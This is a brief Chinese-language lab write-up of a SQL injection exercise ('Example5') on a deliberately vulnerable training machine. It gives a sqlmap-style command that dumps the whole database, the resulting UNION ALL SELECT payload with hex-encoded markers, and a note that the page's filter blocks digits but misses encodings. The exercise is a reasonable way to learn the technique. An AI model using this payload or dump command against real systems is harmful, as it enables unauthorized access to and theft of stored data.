我们打开靶机,选择“sql injections”
选择“Example5”
观察页面
使用工具测试
参数为
-u "http://192.168.29.148/sqli/example5.php?id=2" --dump all
payload为
id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4a4859624e4166537a476246556b4757574375516e647a584a4341486b5a5562614c4d506f4a6e54,0x7162787671),NULL,NULL-- -
明显是经过编码之后的注入
结果
存在sql注入漏洞
我们打开靶机,
分析源代码
过滤了0-9的数字,但是有些编码并没有过滤掉。